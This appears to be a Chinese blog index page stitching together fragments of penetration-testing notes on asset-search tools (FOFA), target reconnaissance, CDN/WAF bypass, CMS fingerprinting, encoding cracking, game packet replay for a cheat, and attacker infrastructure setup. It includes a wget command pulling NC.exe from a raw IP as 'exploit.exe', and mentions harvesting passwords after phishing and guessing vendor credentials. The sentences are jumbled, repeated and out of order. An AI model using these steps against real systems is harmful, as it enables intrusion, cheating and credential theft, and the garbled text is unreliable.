qq_56414082的博客

中进行修改，调用api查询功能需要从配置文件修改为自已对应的 api信息。使用需要·配置fofa的api：默认线程数为30实际需要修改可以在。在配置文件iniFile/config.ini里加入api。首先下载并编辑配置文件，添加自己的。这里只有fofa和github的。和个性化设置，并保留原始文件结构。添加fofa的api。

1、获取网络信息-服务器厂商：阿里云，腾讯云，机房内部等。网络架构：内外网环境。2、获取服务信息-应用协议-内网资产：FTP，SSH，redis 协议 等。3、获取阻碍信息-CDN服务-WAF防火墙，负载均衡，防火墙阻碍。

cdn绕过文章：https://www.cnblogs.com/qiudabai/p/9763739.html。

1、获取网络信息-服务器厂商：阿里云，腾讯云，机房内部等。网络架构：内外网环境。2、获取服务信息-应用协议-内网资产：FTP，SSH，redis 协议 等。3、获取阻碍信息-CDN服务-WAF防火墙，负载均衡，防火墙阻碍。

网上开源的程序，得到名字就可以搜索直接获取到源码。

数据判断： mysql , 通过搭建组合来判断猜测。Z-BlogPHP cms源码名称。Apache 中间件。php 脚本语言。

为了防止某台主机突然死机或者流量过大，会提供几台备用的服务器因此访问的可能是备用的服务器。#一个网站，两套程序，任何一个程序出现问题都可以进行测试，选择不同的目录。例如：钓鱼之后个人电脑被上线获取个人电脑的历史密码等。可以社工猜测得到厂商的账户密码。站点和数据库存放的地址不同，需要进行远程。远程端口连接到平台，猜测账号密码。单个源码的目录指向单个站点域名。针对于网站的防护，应用层防火墙。例如网上之前泄露的密码等。你访问的不一定是真实ip。多地ping，判断。

搜狐视频-BASE64解码https://tv.sohu.com/v/MjAyMTEyMzAvbjYwMTE0NTUxMC5zaHRtbA==.html。解密不直接通过算法解密，枚举，将每个加密后进行碰撞测试出每个位数对应的加密字数。3、看当前密文存在的地方（Web，数据库，操作系统等应用）对1123进行加密，生成的密文进行比对，这样来进行解密的。2、看密文的特征（数字，字幕，大小写，符号等）2.掌握常见的加密解密编码解码进制互转的操作。3.了解常见的加密解密编码解密进制互转的影响。

3.我们可以尝试利用抓取到的数据，首先清空所有的抓包数据，然后在游戏里开启瞬移操作，可以看到数据包的长度发生了变化，此时我选中该数据包，点击发送按钮，即可在游戏里再次瞬移，对于安全测试来说，远程ip端口是我们首要关注的信息。2.启动封包.exe，取消接受包和封包大小限制，选择对应的进程即可抓取到所有的数据。1.打开逍遥安卓模拟器，下载并安装任意游戏，并在设置里关闭WLAN的代理。这里走的是TCP协议，这里获取到了IP就可以进行测试了。注释：这三款软件只能抓取web协议的数据包。数据包十分庞大，要自己过滤。

这里在国内没有经过备案，域名只能在国外解析。地域中域名没备案选择国外的。根据需求购买适合的服务器。将域名添加到服务器。

在kali中执行wget http://47.100.167.248:8081/NC.exe -O exploit.exe，就可以下载文件。执行命令的时候，会有数据的回显，告诉自己这个命令是不是执行成功，有没有文件，但是在大部分的测试环境是没有回显的或者是回显是不齐全的。这里自己创建一个直接访问www.xiaodi8.com/nc.exe 就可以直接下载的连接。服务器是一台电脑，可以支持多个应用程序同时运行，可以处理多个同时连接，而电脑不能。用户组是一群用户的统称，给以给这个组配置不同的权限。